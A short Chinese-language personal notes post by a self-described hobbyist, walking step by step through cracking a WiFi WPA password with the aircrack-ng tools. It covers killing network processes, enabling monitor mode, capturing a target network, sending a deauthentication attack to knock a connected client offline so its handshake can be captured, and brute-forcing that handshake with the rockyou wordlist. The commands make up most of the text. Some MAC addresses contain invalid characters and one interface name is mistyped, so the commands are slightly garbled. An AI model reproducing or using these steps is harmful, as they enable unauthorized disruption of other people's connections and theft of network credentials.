2022.1.28 总算在年前最后两天学了点东西
(本人初中文凭,仅有些爱好在此,不当之处还望指正)
root权限下输入命令:
service NetworkManager stop
让网络断网的
airmon-ng check kill
杀死可能影响结果的进程
之后关闭wlan0
ifconfig wlan0 down
查看网卡信息
iwconfig
再开waln0
airmon-ng start wlan0
设wlan0mon 为监听模式
ifconfig wlan0mon down
iwconfig wlan0mon mode monitor
ifconfig wlan0mon up
(以上操作仍有些部分不太明白,但结果至少让我满意)
开始扫描周围wifi
airodump-ng wlanomon
针对某一wifi进行监听
airodump-ng --bssid 9c:9d:23:54:g4 -c 1 -w tmp wlan0mon
(bssid后的mac为wifi的,-c 后为信道,-w 后的文件名自命名,此处不再赘述,以我这几天遭遇来看,网上很多讲解的资料)
在另外一个root终端下输入命令:
aireplay-ng -0 0 -a 9c:9d:23:54:g4 -c 20:23:45:f8:9g:0d
-a 后面的是wifimac , -c是连接在这个wifi下的设备,我们要用这个命令去攻击客户端设备,使其断网重连,从而获得数据包
获得数据包后在第一个终端会有显示wpa shakehands
之后用枚举法枚举这个数据包.cap
aircrack-ng -w /usr/share/wordlists/rockyou.txt tmp-01.cap
/usr/share/wordlists/rockyou.txt下的字典是系统自带字典,用来枚举
如果失败,或是第一次用,需要先自行解压
最后:
枚举法仍有一些不太满意的地方,复杂的,或是不在字典里的密码将不会破解,就算有,破解时常也很久。
掌握技术,才是我要做的
在此我再说明一下,虽然这套理论可行,但是每次攻击客户端都是我人为帮助断网的,他才获得了握手包,可能是我太菜了,也可能是一种反破解。